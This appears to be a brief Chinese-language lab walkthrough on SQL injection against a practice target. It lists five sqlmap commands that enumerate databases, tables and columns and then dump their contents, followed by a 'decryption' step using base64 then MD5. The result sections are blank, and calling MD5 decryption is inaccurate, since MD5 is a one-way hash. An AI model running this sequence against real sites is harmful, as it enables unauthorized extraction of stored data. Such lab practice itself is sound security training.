SQL注入 靶机实战
进入网址:
寻找注入点,尝试用sqlmap来爆破
步骤:
1.sqlmap.py -u {URL} //查看是否有注入点
2.sqlmap.py -u {URL} -dbs //查看数据库
3.sqlmap.py -u {URL} -D db --tables //查看数据表
4.sqlmap.py -u {URL} -D db -T table --columns //查看列
5.sqlmap.py -u {URL} -D db -T table -C column(s) --dump //输出字段
1、
2、
3、
4、
5、
进行解密:
先用base64,再用MD5
解密成功!